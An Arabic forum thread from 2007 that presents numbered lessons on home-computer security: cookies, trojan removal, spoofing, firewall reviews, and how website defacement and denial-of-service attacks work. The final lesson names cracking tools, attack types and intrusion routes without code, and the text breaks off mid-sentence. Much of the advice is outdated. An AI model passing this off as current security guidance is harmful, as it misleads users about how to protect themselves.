أما ما يجب ان تخاف منه فهو الموقع .. ( ليس موقعنا بالطبع) فيمكن الوصول للكثير منك عن طريق ما يسمى بالسكاكر (Cookies) و هي ملفات بغاية الصغر تضع في جهازك كلما زرت او ملأت استمارة او ما شابه و صمم في الأساس لفائدة معينه مثلا عنما تدخل على حسابك في اي مكان فانه يحفظ لك كلمة المرور بحيث لا تدخلها في كل مرة ..لاحظ ان لك شركة او موقع سكاكر خاصة بها بحيث لا يدخلها غيرها .و هي في الغالب تبقى في جهازك حتى تاربخ الإنتهاء المحدد لها .
لتعرف ما يمكن ان تصل إليه المواقع من جهازك اضغط هنا.. (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://privacy.net/analyze/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://privacy.net/analyze/%27)
؟ IP ما هو الاي بي

هو رقم يخصص لك في كل مرة تدخل إلى الشبكة .. مثل رقم الهانف تقريبا . قد يكون ثابتا بمعنى انك تملك الرقم ذاته في كل مرة تدخل إلى الشبكة او متغيير يتغير عند دخولك و خروجك من الشبكة.لماذا هذا الرقم ؟؟ اجهزة الحاسب تتكلم لغة مشتركه هي لغة(Internet Protocol - IP). و هذه الإرقام هي مفردات تلك اللغة هل يمكن لتلك المواقع الوصول لإسمك او بريدك الإلكتروني؟


قديما و مع المتصفحات القديمة كانت هذه العملية في منتهى السهولةاما اليوم فهذا نادر جدا خاصة مع متصفحات 3 و ما فوق. و لكن هناك حيل جديدة يمكن بها الوصول إلى معلوماتك مثل الجافا و الاكتف اكس Active x و مع ان عمل الجافا في المتصفحات قد حجم بشكل كبير لكن هذا لا يمنع من وجود الثغرات و في الغالب يمكن ان توقف عمل الجافا في اكسبلورر 5 و ما فوق
انتقل إلى Tools>Internet Options >Security >Defult level و ذلك برفع مستوى الامان إلى اعلى قدر ممكن و هذا سيوقف استخدام السكاكر و استقبال ملفات الاكتف اكس ...ألخ كما يمكتك التحكم بما تريد استقباله و ذلك باختيار Custom level

Linux Root
, Tue, 26 Jun 2007 22:52:09 +0200
الدرس الحادي عشر



أفضل طريقة للحماية من الإختراقات والقرصنة
قبل الحديث عن حماية جهازك ، يجب أن نتذكر بعض النقاط المهمة التى بدونها لا فائدة من الحماية:

وجود برنامج حماية من قراصنة الكمبيوتر بجهازك، لا يعني عدم قدرتهم على اختراقه· إذا اعتقدت أن وجود عدة برامج حماية بجهازك ، وتعمل فى آن واحد سوف يحمى جهازك و يزيد من فعالية الحماية فأنت مخطىء تماما، لأن ذلك يضعف من إمكانية الحماية على الجهاز·
وإذا لم تكن مباليا بهؤلاء القراصنة معتقدا أنه ليس في جهازك شئ تخاف عليه، فأنت لم تفهم هدف القراصنة·
ان هدف 80 في المئة من القراصنة هو الحصول على اشتراكك و رقمك السري وبريدك الإلكتروني ورقمه السري ، لأهداف كثيرة وخطيرة جدا، منها الابتزاز والتخريب الذى يتم بسهولة لو تم اختراق جهازك·
أما الـ20 في المئة الباقون، فهدفهم الرئيسى هو التجسس والإطلاع على محتويات جهازك ومعلوماتك الشخصية وصورك الخاصة، وسحب ملفات أو برامج، أو مسحها كلياً من جهازك وهذه الفئة تندرج تحت مسمى الهواة أو الذين يستعرضون عضلاتهم على خلق الله ·
طرق الحماية
إذا كنت تريد الحماية، اتبع الطرق الآتية :
أولاً : يجب التأكد من عدم وجود تروجان بجهازك، والتروجان هو خادم يسمح للمخترق بالتحكم الكامل فى جهازك، ويتم زرعه بجهازك عن طريق المخترق و ذلك بإرساله إليك عن طريق بريدك الإلكتروني مثلا أو عن طريق برامج الدردشة الفورية مثل ICQ أو عن طريق قرص مرن، أو تقوم أنت بزرعه فى جهازك عن طريق الخطأ بسبب عبثك فى برامج الاختراق · فتقوم بفك التروجان في جهازك، بدلا من أن ترسله إلى الجهاز المراد اختراقه ، لذلك أنصحك عدم تحميل هذه البرامج نهائياً ، ولكي نتأكد ما اذا كان بجهازك تروجان أم لا، هناك عدة طرق مثل البحث فى ملف السجل Registry ريجستري الخاص بالوندورز، ولأهمية الريجستيري ولتفادى حذفك الملفات عن طريق الخطأ سوف نبحث عن التروجان بطريقة آمنة و ذلك باستخدام برامج باحثة · الذي يعد أفضل برنامج Cleaner Theفإذا لم يكن متوفرا لديك، قم بتحميله فوراً وهو برنامج http://www.moo/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.moo/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.moo/%27) soft.com/download.php
ثانياً : قم بعمل بحث عن التروجان بالضغط على زر بحث سكان Scan و بعد الانتهاء من البحث على قرصك الصلب، سيخبرك برنامج إن كان يوجد لديك تروجان مزروع بجهازك، وسيعطيك خيار حذفه أو عدمه ، طبعاً إضغط على الموافقة لحذفه · إذا إنتهى البحث و ظهرت نافذة صغيرة مكتوب بها scan complete فهذا معناه أن جهازك خال و نظيف من التروجان ·
ثالثاً : قم بتحديث البرنامج المكافح للفيروسات لديك دائماً ، فبرنامج الفيروسات يقوم أحياناً بكشف التروجان عند فتحه عن طريق تحديث البرنامج الموجود على جهازك لأن عمل UPDATE باستمرار من على الإنترنت · فيكون قد تم وضع آخر إصدار لهذه البرامج المكافحة للفيروس والتروجان من على الموقع الخاص ببرنامج المكافحة ومدك أيضاً بأحداث أسماء للفيروسات والتروجان الذى أنصحك دائماً بعمل UPDATE للبرنامج الخاص بك باستمرار · وأيضاً معرفة أحدث البرنامج المكافحة للفيروسات والتروجان من خلال شبكة الإنترنت ·
رابعاً : استقبل الملفات أو البرامج أو الصور من أشخاص تثق بهم فقط ، وإن لم تفعل ذلك، فعلى الأقل لا تقم بفتحها إلا بعد انقطاعك عن الاتصال ، وبعد فتحها جميعاً قم بعملية بحث عن التروجان بواسطة برنامج Cleaner على قرصك الصلب لتتأكد من خلوه من التروجان ، فالتروجان له خاصية الذوبان فى النظام ، علماً بأن حجمه يتراوح من 50 إلى 150 كيلو بايت حسب نوعيته و إصداره · (قد تستقبل صورة أو ملف و يكون التروجان مزروعا بداخلها لذلك احذر)
خامساً : إاذر الملفات التى تأتيك عن طريق البريد الإلكتروني، فإذا كان الملف المرسل إليك من شخص لا تثق به و من نوع dll أو exe فلا تستقبله أبداً أبداً أبداً أبداً أبداً · سادساً و أخيراً : يفضل أن يكون رقمك السري مكونا من حروف وأرقام، ويكون أكثر من 8 خانات ، كما يفضل تغييره على الأقل كل شهر · أنت الآن فى أمان من الهاكرز إن شاء الله .

Linux Root
, Tue, 26 Jun 2007 22:53:28 +0200
الدرس الثاني عشر

السرية في الإنترنت

الانترنت عبارة عن بحر مفتوح من عمليات الكومبيوتر وعلى ذلك فهي معرضة للكثير من المخاطر المتعلقة بسرية المعلومات لذلك فبمجرد اتصالك بالانترنت فأنت معرض لعملية الاختراق وسرقة البيانات

وبما أن الانترنت ليس لها مالك او حاكم حتى هذه اللحظة وتدير نفسها تلقائياً (أو بالأحرى نحن المستخدمين الذين نديرها)؛ فيجب أن نعلم أنه إذا لم نستطع نحن سكان عالم الانترنت أن نحكمها بعقلانية فسيأتي اليوم الذي تتدخل الجهات الحكومية لإدارتها!
مخاطر الانترنت المحتملة
سرقة المعلومات
اعتراض رسائل البريد الالكتروني وقراءتها.
اختراق أجهزة الغير والاطلاع على المعلومات الموجودة فيها أو تغييرها.
سرقة أرقام بطاقات الإئتمان والأرقام السرية الأخرى.
تعطيل نظام التشغيل
ارسال فيروسات تتسبب في اعطال أياً كانت.
مسح نظام التشغيل أو حذف ملفات نظام.
وجود مواقع غير مناسبة
مواقع إباحية.
مواقع منافية للدين.
مواقع وصفات صناعة متفجرات.
أعداء الانترنت
المتطفلون Hackers
المتطفل هو الشخص الذي يشعر بالفخر لمعرفته بأساليب عمل النظام أو الشبكات بحيث يسعى للدخول عليها بدون تصريح، وهؤلاء الأشخاص عادةً لا يتسببون بأي أضرار مادية.
المخربون Crackers
المخرب هو الشخص الذي يحاول الدخول على أنظمة الكمبيوتر دون تصريح، وهؤلاء الأشخاص عادةً ما يتسببون في أضرار مادية بعكس المتطفلين.
الفيروسات Viruses
الفيروس هو برنامج يكرر نفسه على نظام الكمبيوتر عن طريق دمج نفسه في البرامج الأخرى، وكما أن الفيروسات خطيرة للإنسان لدرجة أنها قد تقضي عليه؛ فالفيروسات االتي نتحدث عنها قد تقضي على الكمبيوتر، وقد تأتي في مختلف الأشكال والأحجام بل أن بعضها لا يسمى فيروساً مثل الدود Worms وأحصنة طروادة Trojan Horses وبعض الفيروسات ليست خطيرة وإنما مزعجة.
بعض التصرفات التي قد تجلب الفيروسات
تشغيل البرامج من الانترنت دون فحصها والتأكد من سلامتها.
تشغيل البرامج من أقراص دون فحصها والتأكـد من سلامتها.
عدم وضع نسخ احتياطية للمعلومات المهمة.
عدم وجود مضاد جيد للفيروسات أو عدم وجود نسخة جديدة منه.
الحماية من الفيروسات
يجب أن لا تبالغ في إجراءات الحماية ضد الفيروسات، كما يجب ألا تتهاون فيها، بحيث لا إفراط ولا تفريط. الأمر المهم أن يكون لديك برنامج مضاد فيروسات ممتاز كبرنامج Norton AntiVirus 5.0 وتأكد من تحديثه بصورة دورية من موقع الشركة المنتجة www.norton.com (http://www.norton.com/) . اعتبر - من باب الحماية - أن جميع البرامج التي تنزلها من الانترنت أو من الأقراص ملغومة بالفيروسات ولذلك قم بفحصها قبل تشغيلها واعلم أن النظام الوحيد الآمن 100% هو المكتوب باليد أو المحفوظ في الذاكرة واحتفظ دائماً بنسخ بديلة للمعلومات المهمة.. وضع في ذهنك أن درهم وقاية خير من قنطار علاج.
المحاكاة Spoofing
المحاكاة هو مصطلح يطلق على عملية انتحال شخصية للدخول الى النظام. حزم الـ IP تحتوي على عناوين للمُرسِل والمُرسَل إليه وهذه العناوين ينظر إليها على أنها عناوين مقبولة وسارية المفعول من قبل البرامج وأجهزة الشبكة، ومن خلال طريقة تعرف بمسارات المصدر Source Routing فإن حزم الـ IP قد يتم إعطائها شكلاً تبدو معه وكأنها قادمة من كمبيوتر معين بينما هي في الحقيقة ليست قادمة منه، وعلى ذلك فإن النظام إذا وثق ببساطة بالهوية التي يحملها عنوان مصدر الحزمة فإنه يكون بذلك قد حوكي (خُدِع). البريد الإلكتروني يمكن أيضاً أن يخدع بسهولة ولكن النظام المؤمن بشكل جيد لا يثق بهذه المصادر ولا يسمح عموماً بالحركة المسيّرة من قبل المصدر Source routed.
بعض خيارات الحماية في الانترنت
عدم الارتباط بالانترنت.
التوثيق (Authentication).
التشفير (Encryption). جدران النار (Firewalls).

Linux Root
, Tue, 26 Jun 2007 22:54:35 +0200
الدرس الثالث عشر
برامج الأمن والحماية.. تحت المجهر

من البديهيات أن يكون لديك برنامج أمني وأنت تبحر في بحر الشبكة متلاطم الأمواج، وأن يكون هذا البرنامج منيع بما فيه الكفاية وأنت تمخر عباب بحر لجي يمنع المتطفلين من أن يعكروا صفو استمتاعك وأنت تقطع أودية الشبكة من أقصاها إلى أقصها.
نتناول اليوم أشهر برنامجين أمنين ومن فئتين مختلفتين هما: Zone Alarm و Norton Internet Security.
الأول وهو من فئة الجدران النارية المنيعة: Zone Alarm
يتميز هذا البرنامج بسهولة التعامل معه من غير أن تكون أحد المبرمجين الذين لا يشق لهم غبار، فأي من رواد الشبكة يستطيع وبكل سهولة أن يتعامل مع البرنامج ويطوعه لكي يلائم متطلبات الأمن ولكي يواجه التحديات الموجودة سلفا وما يستجد منها .

المميزات:
كما أسلفت أن السهولة هي ما يميز هذا البرنامج عن غيره من برامج الأمن.. فمن خلال واجهة استخدام واحدة تستطيع أن تتعامل مع البرنامج، وتوجد في هذه الواجهة كل ما تحتاجه من خيارات ومن أوامر.

هناك اختلاف بسيط بين آخر إصدار من البرنامج وبين الإصدارات الأخرى (ZoneAlarm Pro) غير ذلك لا توجد أي اختلافا ت ومتاهات أخرى. فمن خلال هذه الواجهة تستيطع أن تمنع أو تسمح لأي برنامج أن يصل أو لا يصل إلى الشبكة وأن تحدد أيضاً درجة الأمن المطلوبة.
ومن مميزات البرنامج أيضاً هو أنه يمكن من خلاله أن تتحكم في درجة أمن الشبكة الداخلية إن كنت تعمل في شركة بها شبكة داخلية، وهذه ميزة والحق يقال لا توجد في أعتى برامج الأمن لذلك ينفرد بها زون ألارم عن غيره.
ومن مميزاته أيضاً هو أنه يغلق جميع المنافذ بمعنى الكلمة لأن هناك منافذ لا يستطيع أي برنامج آخر أن يغلقها، إضافة إلى القدرات الأخرى الذي يشترك فيها مع البرامج الأخرى من عرض معلومات المخترق ومن أين أتى وما إلى ذلك .
فلسفته:
تسيطر فلسفة الجدار الناري على مجريات العمل في هذا البرنامج.. فهذا البرنامج جدار ناري صرف نعم هو جدار منيع ولكن ليس كل ما أطلبه هو قوة الجدار وحدها بل هناك أشياء أخرى لابد وأن تكون مأخوذة في الاعتبار عند التعامل مع الشبكة غير قوة الجدار .
عيوبه:
يعيب هذا البرنامج قصور الأداء عند التعامل مع المتحوى الداخلي لصفحات الشبكة.. فهذا البرنامج مثل حارس يقف يقظ بجوار المبنى لكي يمنع أو يسمح لأشخاص معينين بالدخول فقط دون التدخل في تصرفات هذا الشخص مع أهل المبنى، أي أن فلسفة الأمن الشامل لا تروق له كثيراً مكتفياً في أن يحقق في هويات الزوار.
البرنامج الثاني Norton Internet Security المتميز
هكذا تكون البرامج وإلاّ فلا. نعم فلهذا البرنامج من المميزات ما يجعله أحد إن لم يكن الوحيد في فئته من برامج الأمن. فكل من تعامل مع هذا البرنامج يقع في غرامه من أول نظرة لما له من قدرات خيالية لم تكن في حسبان أكثر الناس تفاؤلاً أن يوجد برنامج بمثل هذه القدرات في التعامل مع أمنك الشخصي.

المميزات:
فلتفعل الصفحات ما شاءت من إضافة آكتف إكس أو جافا ابليت فلن تضر، وقد أسلفت في مشاركة أخرى عن آكتف إكس ومن غير المجدي أن أعيد ما ذكرته هنا.

من مميزات هذا البرنامج منع تشغيل هذه المتحكمات إلا بإذن كتابي منك شخصياً. فهذا البرنامج يتعامل مع الأمن بمفهومه الشامل.. فهو جدار ناري وهو مدير أمن شامل أيضاً يمنع إعلانات الصفحات التي تسبب الضيق، ويستطيع أن يمنع تخزين الكوكيز ( وإن كانت هذه المميزات لها برامج مستقلة وقد ضمنت أخيراً في برامج التصفح ومن أشهرها اكسبلورر 6 وهنا تسجل الريادة والسبق للبرنامج ) وتستطيع بمساعدة هذا البرنامج أن تحدد ما يستطيع أفراد عائلتك أن يتصفحوه حتى وإن خارج المنزل أو تغط في سبات عميق، ومن الممكن أن تحدد مفهوم الخصوصية بمعناها وأن تتمتع بأمن وأنت في أودية الشبكة، فلن تستطيع أي صفحة أن تنعم بمعلوم واحدة من متصفحك الذي ينفذ كل أمر يصدر إليه وهو في منتهى الأدب والطاعة مع الصفحات ضارباً عرض كل حائط بأمنك وخصوصيتك.
ومن مميزات هذا البرنامج هو كشف ما تطلبه الصفحات، وتستطيع أن تتمتع بالرعب إذا طالعت تاريخ التصفح إذا علمت ما تطلبه الصفحات من معلومات عنك. فهذا البرنامج يكشف لك هذه الصفحات وما طلبته وأنه رفضها (أدّى دوره والباقي عليك).
وهذا إلى جانب مميزات الجدران النارية جميعها من منع الوصول إليك من قبل المتطفلين ومنع أي برنامج من الوصول إلى الشبكة بدون أن تعلم. وأيضاً من الممكن أن تصنف الصفحات إلى آمنة وغير آمنة، وأن تحدد أي القواعد تطبق معها إلى جانب أن المنافذ مراقبة جميعاً مراقبة من ترصد إلى فريسته في يقظة، إن وجدت منافذ يستحب إغلاقها فمن السهل جداً أن تغلقها وإلى الأبد.
فلسفته:
تسيطر فلسفة الأمن الشامل وما تعنيه من قواعد ومبادئ وأسس على هذا البرنامج، ويأرق نومه الهاجس الأمني نيابة عنك فنم ملء جفنيك فخلفك برنامج يقظ وزكي بما فيه الكفاية.
عيوبه:

يعيب البرنامج بعض الصعوبة في التعامل وخاصة مع المبتدئين لكي يطوعوا البرنامج لمتطلبات الأمن لديهم. لذلك يجب أن يكون هناك شرح وافي للبرنامج من قبل المتقدمين والمحترفين للمساعدة على التغلب على كثرة نوافذ البرنامج وواجهة الاستخدام.
في النهاية أنت من تحدد أي البرامج تستخدم وأي الفلسفات تروق لك .

Linux Root
, Tue, 26 Jun 2007 22:55:51 +0200
الدرس الرابع عشر


إختراق المواقع و طرق الوقاية

ماذا سيكون رد فعلك، إذا دخلت إلى موقع أحد الشركات التجارية الكبرى، أو أحد مواقع إنترنت الحكومية، بقصد الحصول على بيانات رسمية معينة، وإذ برسالة بذيئة، تطالعك في الصفحة الرئيسية من هذا الموقع؟!

إذا كنت مستخدماً عادياً، فستنتقل بسرعة، غالباً، من حالة الصدمة والاندهاش، إلى حالة السخرية من
الموقع والجهة التي يمثلها! أما إذا كنت مشرفاً على هذا الموقع، أو مسؤولاً عن الشبكة التي ينتمي إليها،
فنتوقع أن يؤدي مزيج المشاعر التي ستنتابك، إلى تصبب العرق منك بغزارة.. لأنك ستكون أنت، موضع
السخرية!
حدث الموقفان السابقان ملايين المرات، خلال شهر فبراير/ شباط الفائت.. فقد وقعت عشرات من عمليات
اختراق مزودات ويب، نفذتها مجموعات مختلفة من المخترقين في مناطق عديدة من العالم. وهدف بعضها
إلى تشويه مواقع ويب (defacement)، وذلك بتغيير الصفحة الرئيسية فيها، وتَمثّل بعضها الآخر في
هجمات حجب الخدمة الموزعة DDoS (distributed denial of service)، التي هدفت، كما أشار
المحللون، إلى تدمير شبكة إنترنت بالكامل! وكانت مواقع ويب حكومية عربية، ضحية عدد كبير نسبياً من تلك
العمليات. وقد تتبع فريق DIT بعضها، وقت حدوثها
تتكرر عمليات التشويه بشكل يومي، تقريباً، في عدد كبير جداً من مواقع ويب، إلا أن الأمر الذي لفت الانتباه
إليها في هذه الفترة تحديداً، هو ترافقها مع عمليات الاختراق التي أصابت أكبر مواقع إنترنت العالمية، على
شكل هجمات حجب الخدمة. لكن، كيف حدثت هذه الهجمات والتشويهات؟ ومن وراءها؟ وما هي أهدافها؟
تشويه مواقع ويب
هل شاهدت أفلاماً سينمائية قديمة، تدور أحداثها حول عمليات القرصنة البحرية، التي كانت تتم في القرون
الماضية؟ ربما كان أكثر المشاهد بروزاً في هذه الأفلام، هو مشهد إنزال علم السفينة التجارية، ورفع علم
القراصنة (المكون من عظام وجمجمة) مكانه، للدلالة على السيطرة والنصر!
يوجد تشابه كبير، بين عمليات تشويه مواقع ويب (defacement)، ومشهد إنزال علم دولة معينة، عن
السفينة، ورفع علم القراصنة مكانه، حيث أن عملية التشويه، في أغلب الأحيان، ليست سوى تغيير الصفحة
الرئيسية للموقع، بصفحة أخرى، يعلن المخترق فيها انتصاره على نظام مزود ويب، والإجراءات الأمنية
للشبكة، ويقصد من ورائها إبراز قدراته التقنية، وإعلان تحديه للمشرفين على نظم مزودات ويب، ليثبت
لنفسه، أو لغيره، امتلاكه المقدرة التقنية على كسر نظام الحماية في هذه المزودات، الأمر الذي يتطلب معرفة
معمقة، لطريقة عمل إنترنت، وبروتوكولات التشبيك، وأنظمة التشغيل المختلفة التي تعمل عليها مزودات
ويب. وتتضمن الصفحة الجديدة أحياناً، رسالة يرغب الشخص الذي قام بعملية التشويه إيصالها للعالم. وقد
تتضمن هذه الرسالة اعتراضاً منه على حالة سياسية أو اجتماعية، أو صرخة يريد إيصالها، إلى كل من
يزور هذا الموقع!
وتقتصر الأضرار التي تتسبب بها عمليات تشويه مواقع ويب، على الإضرار بسمعة الجهة المالكة للموقع،
حيث يتم تغيير الصفحة الرئيسية فقط من الموقع، بصفحة HTML من تصميم المخترق، الذي يقتصر هدفه،
كما ذكرنا، على إيصال رسالته إلى العالم عبر الموقع. ولا يلجأ المخترقون، عادةً، في عمليات التشويه إلى
تدمير محتويات الموقع، حيث يمكنك في أغلب المواقع التي تتعرض لعمليات التشويه، الوصول إلى جميع
صفحات المكونة الموقع، إذا كنت تعلم عنوان الصفحة كاملاً.
كيف تحدث عمليات تشويه موقع ويب؟
يتبع المخترقون أساليب عدة، في عمليات تشويه صفحات ويب. وتختلف هذه الأساليب من موقع إلى آخر،
بناءً على نوع نظام التشغيل، ومزود ويب الذي يعتمد عليه الموقع. ونوضح هنا، أكثر هذه الأساليب انتشاراً:
1 الدخول بهوية مخفية (anonymous)، عبر منفذ بروتوكول FTP: تمكن هذه الطريقة، في بعض
الحالات، المخترق من الحصول على ملف كلمة الدخول المشفرة، الخاصة بأحد المشرفين على الشبكة، أو
من يملكون حق تعديل محتويات الموقع، والعمل على فك تشفيرها، حيث يتم إرسال كلمة السر مشفرة في
مختلف المزودات. لكن هذه الشيفرة، تظهر في بعض المزودات، ضمن ملف كلمة السر، ويظلل البعض الآخر
من المزودات، هذه الكلمة بعد تشفيرها (أي يظهر حرف x مكان كل رمز من الكلمة المشفرة). وتصعب الحالة
الأخيرة على المخترقين، عملية كسر الشيفرة.
ويلجأ المخترقون، بعد الحصول على ملف كلمة السر، إلى استخدام برامج خاصة لتخمين كلمات السر. ومن
أكثر هذه البرامج انتشاراً: Cracker Jack، وJohn The Ripper، وJack The Ripper، و
Brute Force Cracker. وتعمل هذه البرامج على تجربة جميع الاحتمالات الممكنة لكلمة السر، من
حروف وأرقام ورموز، لكنها تستغرق وقتاً أطول في التوصل إلى هذه الكلمة، إذا احتوت على عدد أكبر من
الرموز. وقد تصل الفترة التي تتطلبها هذه البرامج، للتوصل إلى كلمة السر، إلى سنوات، بناءً على عدد
الرموز المستخدمة، والنظام المستخدم في عمليات التخمين. وننصح باستخدام كلمة سر طويلة نسبياً،
وتغييرها خلال فترات متقاربة، للتقليل من احتمال توصل أحد المخترقين إليها. فمن شأن حصول المخترق
على كلمة السر الخاصة لأحد المشرفين، السماح له بالدخول إلى مزود ويب، وتغيير الصفحة الرئيسية.
2 استغلال الثغرات الأمنية في مزودات ويب، وأنظمة التشغيل:لا يخلو أي نظام تشغيل، أو مزود ويب، من
ثغرات أمنية تعرض مستخدميه لخطر الاختراق، ويعمل المطورون بشكل مستمر، على سد هذه الثغرات، كلما
اكتشفت. ويستغل الهكرة هذه الثغرات الأمنية في عمليات الاختراق، إلى أن تجد الشركة المصممة للنظام،
الحل المناسب لها. وتبقى بعض الثغرات متاحة لفترة طويلة حتى يتم اكتشافها، وذلك لأن أغلب هذه الثغرات
يكتشفها الهكرة، الذين لا يعلنون عنها بسرعة، ليتمكنوا من استغلالها فترة أطول! وننصح لذلك، جميع مدراء
ومشرفي الشبكات، بمتابعة مواقع الشركات المصممة لنظم التشغيل، ومزودات ويب، للاطلاع على آخر ما تم
التوصل إليه من ثغرات أمنية، وجلب برامج الترقيع (patches) لها، حيث تحرص هذه الشركات على
تقديم مثل هذه البرامج بأسرع وقت ممكن. يمكنك الاطلاع على آخر .
3 استخدام بروتوكول Telnet: تسمح كثير من الثغرات الأمنية في الأنظمة المختلفة، سواء كانت يونكس،
أو ويندوز، أو غيرها، باستخدام تطبيقات تعتمد على بروتوكول Telnet، الذي يسمح بالوصول إلى أجهزة
الكمبيوتر عن بعد، وتنفيذ الأوامر عليها. ويمكن استخدام هذا البروتوكول للدخول إلى مزودات ويب، وتغيير
الصفحات فيها.
تاريخ عمليات تشويه صفحات ويب
بلغ عدد عمليات تشويه صفحات ويب، التي رصدت في أنحاء العالم منذ العام 1995، وحتى الآن، حوالي
5000 عملية، توزعت على مختلف مواقع ويب، التي تملك أسماء نطاقات تجارية (com وnet، وorg)،
ونطاقات محلية في جميع دول العالم تقريباً. وتشير الدراسات، إلى أن حوالي 20 في المائة من عمليات
التشويه، تتم يوم الأحد. ويرجح السبب في ذلك، إلى أن تغيير الصفحة الرئيسية في موقع معين يوم العطلة
الأسبوعية (في معظم دول العالم)، يضمن بقاء التغيير أطول مدة ممكنة، إلى أن يعود مدير الشبكة وموظفو
الشركات، من إجازتهم، ويرجعوا الصفحة الأصلية للموقع، إلى ما كانت.
وحدثت أوائل عمليات التشويه في العالم، العام 1995، ولم تتعدَ في ذلك الوقت، أربع عمليات. وتلتها 18
عملية العام 1996، و28 عملية سنة 1997، ثم تضاعفت العام 1998، عشر مرات، ليصل العدد إلى 233
عملية. وانتشرت حمى تشويه مواقع إنترنت سنة 1999، ليتضاعف عددها حوالي 15 مرة، وليبلغ 3699
عملية تشويه في مختلف أنحاء العالم، ومن ضمنها 16 عملية تمت على مواقع محلية في الدول العربية!
وكانت المواقع المحلية البرازيلية، أكثر دول العالم إصابة بعمليات التشويه، وبلغ عدد العمليات فيها، 178
عملية، تلتها الولايات المتحدة الأمريكية، التي بلغ عدد العمليات فيها 126 عملية.
وجدير بالذكر أن كثيراً من عمليات التشويه، مرت بدون أن يذاع صيتها، فلم تدخل ضمن هذه الإحصائيات.
ويتوقع لذلك، أن يكون عدد عمليات التشويه الفعلية التي تمت، أكبر من العدد المذكور!
هجمات حجب خدمة: الهدف.. تدمير إنترنت!
"الوصول إلى هذا الموقع، غير ممكن!"
قد تعني الرسالة السابقة أن الموقع الذي تحاول أن تزوره، تعرض لهجمات حجب الخدمة، خاصة إذا كان
واحداً من المواقع الكبرى، التي يعني ظهور مثل هذه الرسالة في موقعها، خسارة عشرات الآلاف من الدولارات!
يكمن الفرق بين عمليات التشويه، وبين هجمات حجب الخدمة DoS (denial of service)، أن الأولى
تتم عن طريق اختراق مزودات ويب، وتتم الثانية عن طريق توجيه جهة معينة، حزم بيانات شبكية بصورة
كثيفة جداً، إلى هذه المزودات، بهدف إيقافها عن العمل. ويعتبر القيام بمثل هذه الهجمات سهلاً للغاية، حيث
يوجد عدد كبير من البرامج التي يمكن استخدامها لتوجيه الطلبات والحزم الشبكية إلى هدف محدد، كموقع
إنترنت، أو عنوان IP.
اعتمدت أولى هجمات حجب الخدمة، التي ظهرت في العالم، على توجيه طلبات كثيفة باستخدام بروتوكول
رسائل التحكم بإنترنت ICMP (Internet Control Message Protocol)، الذي يسمح بتبادل
رسائل التحكم، والتعامل مع رسائل الخطأ، بين مزودات ويب. وتحدث هذه الهجمات اليوم، باستخدام منافذ
بروتوكولات TCP، وUDP، بالإضافة إلى ICMP، في تسليط سيل من الرزم الشبكية إلى مزودات معينة،
عبر أوامر، مثل Ping. ومن أشهر الهجمات، تلك التي تستخدم نوع الهجوم المعروف باسم WinNuke،
والتي تسلط سيلاً من الحزم الشبكية عبر المنفذ 139 من نظام NetBIOS، الذي يسمح بتحاور التطبيقات
الموجودة على الأجهزة المرتبطة بالشبكة.
وتوجد بالإضافة إلى ما سبق، عشرات الطرق التي يمكن اتباعها لدفع الحزم أو الطلبات الشبكية، إلى
مزودات معينة، لإيقافها عن العمل، سواء كانت مزودات ويب، أو مزودات بريد إلكتروني، أو أي مزود يمكنه
أن يستقبل الحزم الشبكية. وتعرف أنواع هذه الهجمات، بأسماء غريبة، منها: SYN، وSmurf، و
Floods، وLand، وPing Bomb، وPing O'Death، وFraggle، بالإضافة إلى Winnuke،
المذكور سابقاً. والأمر الذي يزيد الطين بلة، بالإضافة إلى سهولة القيام بمثل هذه الهجمات، هو أن توقعها،
أو صدها صعب جداً! لكن ما دوافع هذه الهجمات؟!
توجد عدة أهداف، قد تدفع جهة معينة، أو شخصاً معيناً، إلى القيام بمثل هذه الهجمات، وأهمها:
1-التسلل إلى النظام: يمكن أن يتمكن بعض المخترقين من التسلل إلى النظام وقت انهياره وحجبه عن
الخدمة، أو وقت إعادة إقلاعه. وتوجد عدة طرق لذلك، على مختلف الأنظمة، وهي أحد الأسباب الأكثر
منطقية لمثل هذه الهجمات.
2-أسباب سياسية: قد توجه جهة معينة، مثل هذه الهجمات، إلى موقع حكومي يتبع دولة تعاديها، أو موقع
شركة تنتمي إلى هذه الدولة. ويتوقع أن تزداد في المستقبل، الهجمات ذات الأهداف السياسية، مع ازدياد
انتشار إنترنت!
3-أسباب اقتصادية: قد توجه شركة صغيرة مثل هذه الهجمات، إلى شركة كبيرة تسيطر على السوق، في نوع
من المنافسة التجارية غير الشريفة!
4-الانتقام: يحدث كثيراً، أن تسرّح شركة أحد الموظفين المسؤولين عن إدارة الشبكة. وقد يلجأ بعض هؤلاء،
إذا ما شعروا بالظلم، إلى الانتقام من الشركة!
5- الطبيعة التخريبية: يلجأ بعض الأشخاص إلى مثل هذه الهجمات، لإشباع رغبات تخريبية تتملكهم!
.
.
ليسوا هكرة!
أثارت العمليات التخريبية الأخيرة، من جديد، حفيظة المدافعين عن المفهوم الحقيقي للهاكر، الذي لا يحتوي
على أي معنىً تخريبي، ويطلق أصلاً، على كل محب للتعمق في المعرفة التقنية. وكان السبب في ذلك،
الحملة الإعلامية الكبيرة، التي شنّتها وسائل الإعلام المختلفة، على من يطلق عليهم خطأً لقب الهكرة، نتيجة
لهذه العمليات، وهم في الحقيقة، ليسوا سوى بعض المراهقين، الذين حصلوا على مجموعة من البرامج، أو
النصوص البرمجية الجاهزة، التي تقوم بهذه الهجمات، وبدءوا باستغلالها في شن هجمات حجب الخدمة
على مواقع إنترنت المختلفة. وأطلق المحللون، والهكرة الحقيقيون، لقب "أطفال النصوص البرمجية" (
Script kiddies) على هؤلاء! وهم مجموعة من الأشخاص الذين يملكون الحد الأدنى من المعرفة التقنية
في مجال الشبكات، ويسبرون مواقع إنترنت، بحثاً عن المزودات التي تتضمن ثغرة معينة، سعياً وراء
